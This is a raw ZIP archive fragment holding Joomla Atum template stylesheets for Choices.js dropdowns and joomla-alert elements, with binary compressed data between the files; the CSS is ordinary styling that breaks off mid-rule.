�ǚ�Gz����N(M�;F]K�6L�N;�t �lL��`<a~N��.�z�i7�޺�붐<ݑAmS��0�=t���ra�(���W$�ˮ|��;XV�dZ�B�Q.h����x���g��5v��W���G���%�B�u{Y��{�p'��H��k_ֳQ��اy}7��mgH�y�֍���S��˄69uA��L�bs�����&��v��ܕ�?�c��l6þ~��Hծ��o�j��6�"�T�#\|	�4���l���޵E��������hL���:���X]�^�*l�����<#�C!u�?�G�ı-;!�?xXa�/��XP�9���]�34KزQ�k�EE����Ż�`�?�;�K�c`���R�[���-�I�r(
C�9Rv��+F�-�ߔi����@h?6��� tŦDɵ���9l5�S�(P7��&e�v�.��k�:�	m!�ϑ[����i�%uO�Y
�munO����
��h����9Xgx��䬁O�m��!��C��V7���8���H�N��#�x PK!N�s<--%atum/css/vendor/choicesjs/choices.cssnu&1i�@charset "UTF-8";
/*===============================
=            Choices            =
===============================*/
.choices {
  position: relative;
  margin-bottom: 24px;
  font-size: 16px;
}
.choices:focus {
  outline: none;
}
.choices:last-child {
  margin-bottom: 0;
}
.choices.is-disabled .choices__inner,
.choices.is-disabled .choices__input {
  background-color: #eaeaea;
  cursor: not-allowed;
  -webkit-user-select: none;
     -moz-user-select: none;
      -ms-user-select: none;
          user-select: none;
}
.choices.is-disabled .choices__item {
  cursor: not-allowed;
}
.choices [hidden] {
  display: none !important;
}

.choices[data-type*=select-one] {
  cursor: pointer;
}
.choices[data-type*=select-one] .choices__inner {
  padding-bottom: 7.5px;
}
.choices[data-type*=select-one] .choices__input {
  display: block;
  width: 100%;
  padding: 10px;
  border-bottom: 1px solid #dddddd;
  background-color: #ffffff;
  margin: 0;
}
.choices[data-type*=select-one] .choices__button {
  background-image: url(data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMjEiIGhlaWdodD0iMjEiIHZpZXdCb3g9IjAgMCAyMSAyMSIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj48ZyBmaWxsPSIjMDAwIiBmaWxsLXJ1bGU9ImV2ZW5vZGQiPjxwYXRoIGQ9Ik0yLjU5Mi4wNDRsMTguMzY0IDE4LjM2NC0yLjU0OCAyLjU0OEwuMDQ0IDIuNTkyeiIvPjxwYXRoIGQ9Ik0wIDE4LjM2NEwxOC4zNjQgMGwyLjU0OCAyLjU0OEwyLjU0OCAyMC45MTJ6Ii8+PC9nPjwvc3ZnPg==);
  padding: 0;
  background-size: 8px;
  position: absolute;
  top: 50%;
  right: 0;
  margin-top: -10px;
  margin-right: 25px;
  height: 20px;
  width: 20px;
  border-radius: 10em;
  opacity: 0.5;
}
.choices[data-type*=select-one] .choices__button:hover, .choices[data-type*=select-one] .choices__button:focus {
  opacity: 1;
}
.choices[data-type*=select-one] .choices__button:focus {
  box-shadow: 0px 0px 0px 2px #00bcd4;
}
.choices[data-type*=select-one] .choices__item[data-value=""] .choices__button {
  display: none;
}
.choices[data-type*=select-one]:after {
  content: "";
  height: 0;
  width: 0;
  border-style: solid;
  border-color: #333333 transparent transparent transparent;
  border-width: 5px;
  position: absolute;
  right: 11.5px;
  top: 50%;
  margin-top: -2.5px;
  pointer-events: none;
}
.choices[data-type*=select-one].is-open:after {
  border-color: transparent transparent #333333 transparent;
  margin-top: -7.5px;
}
.choices[data-type*=select-one][dir=rtl]:after {
  left: 11.5px;
  right: auto;
}
.choices[data-type*=select-one][dir=rtl] .choices__button {
  right: auto;
  left: 0;
  margin-left: 25px;
  margin-right: 0;
}

.choices[data-type*=select-multiple] .choices__inner,
.choices[data-type*=text] .choices__inner {
  cursor: text;
}
.choices[data-type*=select-multiple] .choices__button,
.choices[data-type*=text] .choices__button {
  position: relative;
  display: inline-block;
  margin-top: 0;
  margin-right: -4px;
  margin-bottom: 0;
  margin-left: 8px;
  padding-left: 16px;
  border-left: 1px solid #008fa1;
  background-image: url(data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMjEiIGhlaWdodD0iMjEiIHZpZXdCb3g9IjAgMCAyMSAyMSIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj48ZyBmaWxsPSIjRkZGIiBmaWxsLXJ1bGU9ImV2ZW5vZGQiPjxwYXRoIGQ9Ik0yLjU5Mi4wNDRsMTguMzY0IDE4LjM2NC0yLjU0OCAyLjU0OEwuMDQ0IDIuNTkyeiIvPjxwYXRoIGQ9Ik0wIDE4LjM2NEwxOC4zNjQgMGwyLjU0OCAyLjU0OEwyLjU0OCAyMC45MTJ6Ii8+PC9nPjwvc3ZnPg==);
  background-size: 8px;
  width: 8px;
  line-height: 1;
  opacity: 0.75;
  border-radius: 0;
}
.choices[data-type*=select-multiple] .choices__button:hover, .choices[data-type*=select-multiple] .choices__button:focus,
.choices[data-type*=text] .choices__button:hover,
.choices[data-type*=text] .choices__button:focus {
  opacity: 1;
}

.choices__inner {
  display: inline-block;
  vertical-align: top;
  width: 100%;
  background-color: #f9f9f9;
  padding: 7.5px 7.5px 3.75px;
  border: 1px solid #dddddd;
  border-radius: 2.5px;
  font-size: 14px;
  min-height: 44px;
  overflow: hidden;
}
.is-focused .choices__inner, .is-open .choices__inner {
  border-color: #b7b7b7;
}
.is-open .choices__inner {
  border-radius: 2.5px 2.5px 0 0;
}
.is-flipped.is-open .choices__inner {
  border-radius: 0 0 2.5px 2.5px;
}

.choices__list {
  margin: 0;
  padding-left: 0;
  list-style: none;
}

.choices__list--single {
  display: inline-block;
  padding: 4px 16px 4px 4px;
  width: 100%;
}
[dir=rtl] .choices__list--single {
  padding-right: 4px;
  padding-left: 16px;
}
.choices__list--single .choices__item {
  width: 100%;
}

.choices__list--multiple {
  display: inline;
}
.choices__list--multiple .choices__item {
  display: inline-block;
  vertical-align: middle;
  border-radius: 20px;
  padding: 4px 10px;
  font-size: 12px;
  font-weight: 500;
  margin-right: 3.75px;
  margin-bottom: 3.75px;
  background-color: #00bcd4;
  border: 1px solid #00a5bb;
  color: #ffffff;
  word-break: break-all;
  box-sizing: border-box;
}
.choices__list--multiple .choices__item[data-deletable] {
  padding-right: 5px;
}
[dir=rtl] .choices__list--multiple .choices__item {
  margin-right: 0;
  margin-left: 3.75px;
}
.choices__list--multiple .choices__item.is-highlighted {
  background-color: #00a5bb;
  border: 1px solid #008fa1;
}
.is-disabled .choices__list--multiple .choices__item {
  background-color: #aaaaaa;
  border: 1px solid #919191;
}

.choices__list--dropdown {
  visibility: hidden;
  z-index: 1;
  position: absolute;
  width: 100%;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  top: 100%;
  margin-top: -1px;
  border-bottom-left-radius: 2.5px;
  border-bottom-right-radius: 2.5px;
  overflow: hidden;
  word-break: break-all;
  will-change: visibility;
}
.choices__list--dropdown.is-active {
  visibility: visible;
}
.is-open .choices__list--dropdown {
  border-color: #b7b7b7;
}
.is-flipped .choices__list--dropdown {
  top: auto;
  bottom: 100%;
  margin-top: 0;
  margin-bottom: -1px;
  border-radius: 0.25rem 0.25rem 0 0;
}
.choices__list--dropdown .choices__list {
  position: relative;
  max-height: 300px;
  overflow: auto;
  -webkit-overflow-scrolling: touch;
  will-change: scroll-position;
}
.choices__list--dropdown .choices__item {
  position: relative;
  padding: 10px;
  font-size: 14px;
}
[dir=rtl] .choices__list--dropdown .choices__item {
  text-align: right;
}
@media (min-width: 640px) {
  .choices__list--dropdown .choices__item--selectable {
    padding-right: 100px;
  }
  .choices__list--dropdown .choices__item--selectable:after {
    content: attr(data-select-text);
    font-size: 12px;
    opacity: 0;
    position: absolute;
    right: 10px;
    top: 50%;
    -webkit-transform: translateY(-50%);
            transform: translateY(-50%);
  }
  [dir=rtl] .choices__list--dropdown .choices__item--selectable {
    text-align: right;
    padding-left: 100px;
    padding-right: 10px;
  }
  [dir=rtl] .choices__list--dropdown .choices__item--selectable:after {
    right: auto;
    left: 10px;
  }
}
.choices__list--dropdown .choices__item--selectable.is-highlighted {
  background-color: #f2f2f2;
}
.choices__list--dropdown .choices__item--selectable.is-highlighted:after {
  opacity: 0.5;
}

.choices__item {
  cursor: default;
}

.choices__item--selectable {
  cursor: pointer;
}

.choices__item--disabled {
  cursor: not-allowed;
  -webkit-user-select: none;
     -moz-user-select: none;
      -ms-user-select: none;
          user-select: none;
  opacity: 0.5;
}

.choices__heading {
  font-weight: 600;
  font-size: 12px;
  padding: 10px;
  border-bottom: 1px solid #f7f7f7;
  color: gray;
}

.choices__button {
  text-indent: -9999px;
  -webkit-appearance: none;
  -moz-appearance: none;
       appearance: none;
  border: 0;
  background-color: transparent;
  background-repeat: no-repeat;
  background-position: center;
  cursor: pointer;
}
.choices__button:focus {
  outline: none;
}

.choices__input {
  display: inline-block;
  vertical-align: baseline;
  background-color: #f9f9f9;
  font-size: 14px;
  margin-bottom: 5px;
  border: 0;
  border-radius: 0;
  max-width: 100%;
  padding: 4px 0 4px 2px;
}
.choices__input:focus {
  outline: 0;
}
[dir=rtl] .choices__input {
  padding-right: 2px;
  padding-left: 0;
}

.choices__placeholder {
  opacity: 0.5;
}

/*=====  End of Choices  ======*/
.choices {
  border: 0;
  border-radius: 0.25rem;
}
.choices:hover {
  cursor: pointer;
}
.choices.is-focused {
  box-shadow: 0 0 0 0.2rem #eaeaea;
}

.choices__inner {
  min-height: 42px;
  padding: 0.1rem 1rem;
  margin-bottom: 0;
  font-size: 1rem;
  border: solid 1px var(--template-bg-dark-20);
  border-radius: 0.25rem;
}
.is-focused .choices__inner {
  border-color: #39f;
}

.choices__input {
  padding: 0;
  margin-bottom: 0;
  font-size: 1rem;
  background-color: transparent;
}
.choices__input::-moz-placeholder {
  color: #495057;
  opacity: 1;
}
.choices__input::-webkit-input-placeholder {
  color: #495057;
  opacity: 1;
}

.choices__list--dropdown {
  z-index: 1060;
}

.choices__list--single {
  padding: 7px 16px 0 4px;
}

.choices__list--multiple .choices__item {
  position: relative;
  margin: 2px;
  background-color: var(--template-bg-dark);
  -webkit-margin-end: 2px;
          margin-inline-end: 2px;
  border: 0;
  border-radius: 0.25rem;
}
.choices__list--multiple .choices__item.is-highlighted {
  background-color: var(--template-bg-dark);
  opacity: 0.9;
}

.choices .choices__list--dropdown .choices__item {
  -webkit-padding-end: 10px;
          padding-inline-end: 10px;
}
.choices .choices__list--dropdown .choices__item--selectable::after {
  display: none;
}

.choices__button_joomla {
  position: relative;
  padding: 0 10px;
  color: inherit;
  text-indent: -9999px;
  cursor: pointer;
  background: none;
  border: 0;
  opacity: 0.5;
  -webkit-appearance: none;
     -moz-appearance: none;
          appearance: none;
}
.choices__button_joomla::before {
  position: absolute;
  top: 0;
  right: 0;
  bottom: 0;
  left: 0;
  display: block;
  text-align: center;
  text-indent: 0;
  content: "×";
}
.choices__button_joomla:hover, .choices__button_joomla:focus {
  opacity: 1;
}
.choices__button_joomla:focus {
  outline: none;
}

.choices[data-type*=select-one] .choices__inner,
.choices[data-type*=select-multiple] .choices__inner {
  -webkit-padding-end: 3rem;
          padding-inline-end: 3rem;
  cursor: pointer;
  background: url("../../../images/select-bg.svg") no-repeat 100%/116rem;
  background-color: var(--template-bg-light);
}
[dir=rtl] .choices[data-type*=select-one] .choices__inner,
[dir=rtl] .choices[data-type*=select-multiple] .choices__inner {
  background: url("../../../images/select-bg-rtl.svg") no-repeat 0/116rem;
  background-color: var(--template-bg-light);
}

.choices[data-type*=select-one] .choices__item {
  display: flex;
  justify-content: space-between;
}
.choices[data-type*=select-one] .choices__button_joomla {
  position: absolute;
  top: 50%;
  right: 0;
  width: 20px;
  height: 20px;
  padding: 0;
  margin-top: -10px;
  margin-right: 50px;
  border-radius: 10em;
  opacity: 0.5;
}
[dir=rtl] .choices[data-type*=select-one] .choices__button_joomla {
  right: auto;
  left: 0;
  margin-right: 0;
  margin-left: 50px;
}
.choices[data-type*=select-one] .choices__button_joomla:hover, .choices[data-type*=select-one] .choices__button_joomla:focus {
  opacity: 1;
}
.choices[data-type*=select-one] .choices__button_joomla:focus {
  box-shadow: 0 0 0 2px #00bcd4;
}
.choices[data-type*=select-one]::after {
  display: none;
}

.choices[data-type*=select-multiple] .choices__input,
.choices[data-type*=text] .choices__input {
  padding: 0.35rem 0;
}

.choices__heading {
  font-size: 1.2rem;
}PK!�Ea9��,atum/css/vendor/choicesjs/choices.min.css.gznu&1i���Z	o�8�+�43�K_9$���Y�i'��bR%�6�D����4lxH2EQ��,��R���w~�=��x����N~��uqⴽI�=�n�(�G�� )�#'����Qv�/�QR+�kdw���6�l�"o�n�%8Dv�h7F`J-o���)S�;m�Z>N�K�������%����ƅ��8�f�oy����r�Y���0�$$Z ߱�}�Ԛ�(�RD�GˎDk�Ӵ�PpP��M��bZ���>
�o�����7�QBaH����B��b�����^��ӎ#R�z]W�&����qn��@1o"�9�.��Gg�}:�;��ɨ��Cn��Ly�J�x�J#������G�Q扊��ȝ1��8�cd��O����t>�y�n���>��>����{�N?��	�_����?N�{=X��?"������=�wz���r���X
��.n{���ϟ���C@R�}g�]6����fn���fڿ��G��n���O_nfë߀{��;v�޿]~z�_�M�|��j<�'���[��W����0·k�^1�~8�2�
����w�N�����}��a����t1`���Œ@5�@�f�@��:�ȡQl��<�P6+����=��]�r���|T:PW��x�27B����te�G{���WGO�Ds*�'��q���N�-l��W��\��sR�[sHf��ɉ��U49Dۆ#�a<
�}r�[d���A�4�aÄMȍ�̛�n��3��4w��1���7�b$�2��|���$C��S��`R]��}�q�&�$WA�B$)�Ѩ1���vDA��q'b�={�1��cR�}cP����%>x�RR�Fke�W��ܑq�KK��</�,V��@0�e2i��x��t��v�����߀��{|��1LyBb	�&,�aLg��
���0��+���ݳẌ́�l������=HX�ǡ�K����%���-��%?{L�EtT값$ +�?��=���3bU�-+�-c�SM�ueJ���=����*�-��Ҫd��8F~C
"�(&!8��n�>h�tE��GN����1Af����Ѫ՗��nMi�D9�G���	k��[eU}B,���餛�s�\� ��N �'P��n~���8��3W/����WbFVb��\�Q�{�rm��:G�wx͹-z�eS5I��>Q�C~�l˽���T_�J���BS�xM�)!cR�БIy<�nk��W��ָ��"��D1������ń�)gm��GK�~�u�~`e�7C'/"ŤR��7�B�e|-�c�_���}L��M`�J����:�/�T툯��WSi-`g�[?��EԷ�N��3�ū��L-�� AA+�#0�f5�
�n�2Og=Tm&�M����zIDrͼII�r��i•��*W���rރu�y%�!�p��/�1l��\��Y��t�iH���x8kH��J�>��ֆBJQ�g�X\�S��2
��@�6sk�Fp%�l���/-�ƩS?t��Kjҍ��j�d;k���t�7���Slt8������X7l��wU}4�,}l�h�f�43OK��Ҟ�c�i� 7�F-h�XA�9|�-��9���e� 5d��pG�Y�Y���˥��!�~)����,+�j�,m��p�d�Ա"�y��گ��f<�з��������	���T��Yư1.�/�g���iM.`�)^7�z#��G�M"⛃kS#�̵�����XFi����.O��9M��U�K���>�hj/E�Tgs���X�b�;�|�<Z]pZ#c}��=��Ѷ��2���0���-BP�]�B�r�y;A�̂Z�IB+݊�����>�[�ߍ�ź�H����M{ZYf�b~v��@����?�C�c����ݡ`Ӻ.3v.QG�#I;jY��Z�x��C�i�)h���Np8A	��)��E1��mv���U'��"V����g\E�g{C�3Q���G8��˟�>�夼Ө��o+����O��4�|��q���y��v�������liw�N���VQT�x�}��!��"~M��Q�i4ݨ��bZ��.*8^�����t������ʝ��.��Ft�Px�!i:j����a�ظ�xkΛ���b����x���8�?]�C�cg?�h��*�9�ޗ^��pm��Z�'���1Y���u���I%PK!��I%I%)atum/css/vendor/choicesjs/choices.min.cssnu&1i�@charset "UTF-8";.choices{position:relative;margin-bottom:24px;font-size:16px}.choices:focus{outline:none}.choices:last-child{margin-bottom:0}.choices.is-disabled .choices__inner,.choices.is-disabled .choices__input{background-color:#eaeaea;cursor:not-allowed;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.choices.is-disabled .choices__item{cursor:not-allowed}.choices [hidden]{display:none!important}.choices[data-type*=select-one]{cursor:pointer}.choices[data-type*=select-one] .choices__inner{padding-bottom:7.5px}.choices[data-type*=select-one] .choices__input{display:block;width:100%;padding:10px;border-bottom:1px solid #ddd;background-color:#fff;margin:0}.choices[data-type*=select-one] .choices__button{background-image:url(data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMjEiIGhlaWdodD0iMjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PGcgZmlsbC1ydWxlPSJldmVub2RkIj48cGF0aCBkPSJNMi41OTIuMDQ0bDE4LjM2NCAxOC4zNjQtMi41NDggMi41NDhMLjA0NCAyLjU5MnoiLz48cGF0aCBkPSJNMCAxOC4zNjRMMTguMzY0IDBsMi41NDggMi41NDhMMi41NDggMjAuOTEyeiIvPjwvZz48L3N2Zz4=);padding:0;background-size:8px;position:absolute;top:50%;right:0;margin-top:-10px;margin-right:25px;height:20px;width:20px;border-radius:10em;opacity:.5}.choices[data-type*=select-one] .choices__button:focus,.choices[data-type*=select-one] .choices__button:hover{opacity:1}.choices[data-type*=select-one] .choices__button:focus{box-shadow:0 0 0 2px #00bcd4}.choices[data-type*=select-one] .choices__item[data-value=""] .choices__button{display:none}.choices[data-type*=select-one]:after{content:"";height:0;width:0;border:5px solid transparent;border-top-color:#333;position:absolute;right:11.5px;top:50%;margin-top:-2.5px;pointer-events:none}.choices[data-type*=select-one].is-open:after{border-color:transparent transparent #333;margin-top:-7.5px}.choices[data-type*=select-one][dir=rtl]:after{left:11.5px;right:auto}.choices[data-type*=select-one][dir=rtl] .choices__button{right:auto;left:0;margin-left:25px;margin-right:0}.choices[data-type*=select-multiple] .choices__inner,.choices[data-type*=text] .choices__inner{cursor:text}.choices[data-type*=select-multiple] .choices__button,.choices[data-type*=text] .choices__button{position:relative;display:inline-block;margin:0 -4px 0 8px;padding-left:16px;border-left:1px solid #008fa1;background-image:url(data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMjEiIGhlaWdodD0iMjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PGcgZmlsbD0iI0ZGRiIgZmlsbC1ydWxlPSJldmVub2RkIj48cGF0aCBkPSJNMi41OTIuMDQ0bDE4LjM2NCAxOC4zNjQtMi41NDggMi41NDhMLjA0NCAyLjU5MnoiLz48cGF0aCBkPSJNMCAxOC4zNjRMMTguMzY0IDBsMi41NDggMi41NDhMMi41NDggMjAuOTEyeiIvPjwvZz48L3N2Zz4=);background-size:8px;width:8px;line-height:1;opacity:.75;border-radius:0}.choices[data-type*=select-multiple] .choices__button:focus,.choices[data-type*=select-multiple] .choices__button:hover,.choices[data-type*=text] .choices__button:focus,.choices[data-type*=text] .choices__button:hover{opacity:1}.choices__inner{display:inline-block;vertical-align:top;width:100%;background-color:#f9f9f9;padding:7.5px 7.5px 3.75px;border:1px solid #ddd;border-radius:2.5px;font-size:14px;min-height:44px;overflow:hidden}.is-focused .choices__inner,.is-open .choices__inner{border-color:#b7b7b7}.is-open .choices__inner{border-radius:2.5px 2.5px 0 0}.is-flipped.is-open .choices__inner{border-radius:0 0 2.5px 2.5px}.choices__list{margin:0;padding-left:0;list-style:none}.choices__list--single{display:inline-block;padding:4px 16px 4px 4px;width:100%}[dir=rtl] .choices__list--single{padding-right:4px;padding-left:16px}.choices__list--single .choices__item{width:100%}.choices__list--multiple{display:inline}.choices__list--multiple .choices__item{display:inline-block;vertical-align:middle;border-radius:20px;padding:4px 10px;font-size:12px;font-weight:500;margin-right:3.75px;margin-bottom:3.75px;background-color:#00bcd4;border:1px solid #00a5bb;color:#fff;word-break:break-all;box-sizing:border-box}.choices__list--multiple .choices__item[data-deletable]{padding-right:5px}[dir=rtl] .choices__list--multiple .choices__item{margin-right:0;margin-left:3.75px}.choices__list--multiple .choices__item.is-highlighted{background-color:#00a5bb;border:1px solid #008fa1}.is-disabled .choices__list--multiple .choices__item{background-color:#aaa;border:1px solid #919191}.choices__list--dropdown{visibility:hidden;z-index:1;position:absolute;width:100%;background-color:#fff;border:1px solid #ddd;top:100%;margin-top:-1px;border-bottom-left-radius:2.5px;border-bottom-right-radius:2.5px;overflow:hidden;word-break:break-all;will-change:visibility}.choices__list--dropdown.is-active{visibility:visible}.is-open .choices__list--dropdown{border-color:#b7b7b7}.is-flipped .choices__list--dropdown{top:auto;bottom:100%;margin-top:0;margin-bottom:-1px;border-radius:.25rem .25rem 0 0}.choices__list--dropdown .choices__list{position:relative;max-height:300px;overflow:auto;-webkit-overflow-scrolling:touch;will-change:scroll-position}.choices__list--dropdown .choices__item{position:relative;padding:10px;font-size:14px}[dir=rtl] .choices__list--dropdown .choices__item{text-align:right}@media (min-width:640px){.choices__list--dropdown .choices__item--selectable{padding-right:100px}.choices__list--dropdown .choices__item--selectable:after{content:attr(data-select-text);font-size:12px;opacity:0;position:absolute;right:10px;top:50%;-webkit-transform:translateY(-50%);transform:translateY(-50%)}[dir=rtl] .choices__list--dropdown .choices__item--selectable{text-align:right;padding-left:100px;padding-right:10px}[dir=rtl] .choices__list--dropdown .choices__item--selectable:after{right:auto;left:10px}}.choices__list--dropdown .choices__item--selectable.is-highlighted{background-color:#f2f2f2}.choices__list--dropdown .choices__item--selectable.is-highlighted:after{opacity:.5}.choices__item{cursor:default}.choices__item--selectable{cursor:pointer}.choices__item--disabled{cursor:not-allowed;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;opacity:.5}.choices__heading{font-weight:600;font-size:12px;padding:10px;border-bottom:1px solid #f7f7f7;color:grey}.choices__button{text-indent:-9999px;-webkit-appearance:none;-moz-appearance:none;appearance:none;border:0;background-color:transparent;background-repeat:no-repeat;background-position:50%;cursor:pointer}.choices__button:focus{outline:none}.choices__input{display:inline-block;vertical-align:baseline;background-color:#f9f9f9;font-size:14px;margin-bottom:5px;border:0;border-radius:0;max-width:100%;padding:4px 0 4px 2px}.choices__input:focus{outline:0}[dir=rtl] .choices__input{padding-right:2px;padding-left:0}.choices__placeholder{opacity:.5}.choices{border:0;border-radius:.25rem}.choices:hover{cursor:pointer}.choices.is-focused{box-shadow:0 0 0 .2rem #eaeaea}.choices__inner{min-height:42px;padding:.1rem 1rem;margin-bottom:0;font-size:1rem;border:1px solid var(--template-bg-dark-20);border-radius:.25rem}.is-focused .choices__inner{border-color:#39f}.choices__input{padding:0;margin-bottom:0;font-size:1rem;background-color:transparent}.choices__input::-moz-placeholder{color:#495057;opacity:1}.choices__input::-webkit-input-placeholder{color:#495057;opacity:1}.choices__list--dropdown{z-index:1060}.choices__list--single{padding:7px 16px 0 4px}.choices__list--multiple .choices__item{position:relative;margin:2px;background-color:var(--template-bg-dark);-webkit-margin-end:2px;margin-inline-end:2px;border:0;border-radius:.25rem}.choices__list--multiple .choices__item.is-highlighted{background-color:var(--template-bg-dark);opacity:.9}.choices .choices__list--dropdown .choices__item{-webkit-padding-end:10px;padding-inline-end:10px}.choices .choices__list--dropdown .choices__item--selectable:after{display:none}.choices__button_joomla{position:relative;padding:0 10px;color:inherit;text-indent:-9999px;cursor:pointer;background:none;border:0;opacity:.5;-webkit-appearance:none;-moz-appearance:none;appearance:none}.choices__button_joomla:before{position:absolute;top:0;right:0;bottom:0;left:0;display:block;text-align:center;text-indent:0;content:"×"}.choices__button_joomla:focus,.choices__button_joomla:hover{opacity:1}.choices__button_joomla:focus{outline:none}.choices[data-type*=select-multiple] .choices__inner,.choices[data-type*=select-one] .choices__inner{-webkit-padding-end:3rem;padding-inline-end:3rem;cursor:pointer;background:url(../../../images/select-bg.svg) no-repeat 100%/116rem;background-color:var(--template-bg-light)}[dir=rtl] .choices[data-type*=select-multiple] .choices__inner,[dir=rtl] .choices[data-type*=select-one] .choices__inner{background:url(../../../images/select-bg-rtl.svg) no-repeat 0/116rem;background-color:var(--template-bg-light)}.choices[data-type*=select-one] .choices__item{display:flex;justify-content:space-between}.choices[data-type*=select-one] .choices__button_joomla{position:absolute;top:50%;right:0;width:20px;height:20px;padding:0;margin-top:-10px;margin-right:50px;border-radius:10em;opacity:.5}[dir=rtl] .choices[data-type*=select-one] .choices__button_joomla{right:auto;left:0;margin-right:0;margin-left:50px}.choices[data-type*=select-one] .choices__button_joomla:focus,.choices[data-type*=select-one] .choices__button_joomla:hover{opacity:1}.choices[data-type*=select-one] .choices__button_joomla:focus{box-shadow:0 0 0 2px #00bcd4}.choices[data-type*=select-one]:after{display:none}.choices[data-type*=select-multiple] .choices__input,.choices[data-type*=text] .choices__input{padding:.35rem 0}.choices__heading{font-size:1.2rem}PK!M�,�)�)7atum/css/vendor/joomla-custom-elements/joomla-alert.cssnu&1i�joomla-alert {
  --jui-alert-min-width: 250px;
  --jui-alert-padding: .5rem 1.25rem;
  --jui-alert-margin: 0 0 1rem 0;
  --jui-alert-border: 1px solid transparent;
  --jui-alert-border-radius: .25rem;
  --jui-alert-animation-duration: .5s;
  --jui-alert-animation-timing-function: ease-in-out;
  --jui-alert-button-color-dark: #000;
  --jui-alert-button-color-light: #fff;
  --jui-alert-success-color: #234423;
  --jui-alert-success-background-color: #d9e6d9;
  --jui-alert-success-border-color: #cadcca;
  --jui-alert-success-link-color: #122212;
  --jui-alert-info-color: #0c5460;
  --jui-alert-info-background-color: #d1ecf1;
  --jui-alert-info-border-color: #bee5eb;
  --jui-alert-info-link-color: #062c33;
  --jui-alert-warning-color: #7d5a29;
  --jui-alert-warning-background-color: #fcefdc;
  --jui-alert-warning-border-color: #fbe8cd;
  --jui-alert-warning-link-color: #573e1c;
  --jui-alert-danger-color: #712b29;
  --jui-alert-danger-background-color: #f7dddc;
  --jui-alert-danger-border-color: #f4cfce;
  --jui-alert-danger-link-color: #4c1d1b;
  display: block;
  min-width: var(--jui-alert-min-width, 250px);
  padding: var(--jui-alert-padding, 0.5rem 1.25rem);
  margin: var(--jui-alert-margin, 0 0 1rem 0);
  border: var(--jui-alert-border, 1px solid transparent);
  border-radius: var(--jui-alert-border-radius, 0.25rem);
  -webkit-animation-duration: var(--jui-alert-animation-duration, 0.5s);
  animation-duration: var(--jui-alert-animation-duration, 0.5s);
  -webkit-animation-timing-function: var(--jui-alert-animation-timing-function, ease-in-out);
  animation-timing-function: var(--jui-alert-animation-timing-function, ease-in-out);
}

joomla-alert .joomla-alert--close {
  position: relative;
  top: -0.5rem;
  right: -1.25rem;
  float: right;
  padding: 0.2rem 1rem;
  font-size: 1.5rem;
  font-weight: 700;
  line-height: 1;
  color: var(--jui-alert-button-color-dark, #000);
  text-shadow: 0 1px 0 var(--jui-alert-button-color-light, #fff);
  background: transparent;
  border: 0;
  opacity: 0.5;
}

joomla-alert .joomla-alert--close:hover,
joomla-alert .joomla-alert--close:focus {
  color: var(--jui-alert-button-color-dark, #000);
  text-decoration: none;
  cursor: pointer;
  opacity: 0.75;
}

joomla-alert[type=success] {
  color: var(--jui-alert-success-color, #234423);
  background-color: var(--jui-alert-success-background-color, #d9e6d9);
  border-color: var(--jui-alert-success-border-color, #cadcca);
}

joomla-alert[type=success] hr {
  border-top-color: var(--jui-alert-success-border-color, #cadcca);
}

joomla-alert[type=success] .alert-link {
  color: var(--jui-alert-success-link-color, #122212);
}

joomla-alert[type=info] {
  color: var(--jui-alert-info-color, #0c5460);
  background-color: var(--jui-alert-info-background-color, #d1ecf1);
  border-color: var(--jui-alert-info-border-color, #bee5eb);
}

joomla-alert[type=info] hr {
  border-top-color: var(--jui-alert-info-border-color, #bee5eb);
}

joomla-alert[type=info] .alert-link {
  color: var(--jui-alert-info-link-color, #062c33);
}

joomla-alert[type=warning] {
  color: var(--jui-alert-warning-color, #7d5a29);
  background-color: var(--jui-alert-warning-background-color, #fcefdc);
  border-color: var(--jui-alert-warning-border-color, #fbe8cd);
}

joomla-alert[type=warning] hr {
  border-top-color: var(--jui-alert-warning-border-color, #fbe8cd);
}

joomla-alert[type=warning] .alert-link {
  color: var(--jui-alert-warning-link-color, #573e1c);
}

joomla-alert[type=danger] {
  color: var(--jui-alert-danger-color, #712b29);
  background-color: var(--jui-alert-danger-background-color, #f7dddc);
  border-color: var(--jui-alert-danger-border-color, #f4cfce);
}

joomla-alert[type=danger] hr {
  border-top-color: var(--jui-alert-danger-border-color, #f4cfce);
}

joomla-alert[type=danger] .alert-link {
  color: var(--jui-alert-danger-link-color, #4c1d1b);
}

html[dir=rtl] joomla-alert .joomla-alert--close,
html[dir=rtl] joomla-alert .joomla-alert-button--close {
  right: auto;
  left: -1.25rem;
  float: left;
}

@-webkit-keyframes joomla-alert-fade-in {
  0% {
    opacity: 0;
  }
}
@keyframes joomla-alert-fade-in {
  0% {
    opacity: 0;
  }
}
@-webkit-keyframes joomla-alert-fade-out {
  0% {
    opacity: 1;
  }
  100% {
    opacity: 0;
  }
}
@keyframes joomla-alert-fade-out {
  0% {
    opacity: 1;
  }
  100% {
    opacity: 0;
  }
}
@media (prefers-reduced-motion: reduce) {
  joomla-alert {
    -webkit-animation-duration: 1ms !important;
    animation-duration: 1ms !important;
  }
}
#system-message-container joomla-alert {
  position: relative;
  display: flex;
  width: 100%;
  min-width: 16rem;
  padding: 0;
  margin-bottom: 1rem;
  color: var(--alert-accent-color, var(--template-bg-dark));
  background-color: var(--alert-bg-color, var(--white));
  border: 1px solid var(--alert-accent-color, var(--template-bg-dark));
  border-radius: 0.25rem;
  transition: opacity 0.15s linear;
}
#system-message-container joomla-alert .alert-heading {
  display: flex;
  flex-direction: column;
  justify-content: center;
  padding: 0.8rem;
  color: var(--white);
  background: var(--alert-accent-color, var(--template-bg-dark));
  align-content: center;
}
#system-message-container joomla-alert .alert-heading .message::before,
#system-message-container joomla-alert .alert-heading .success::before {
  display: inline-block;
  width: 1em;
  height: 1em;
  content: "";
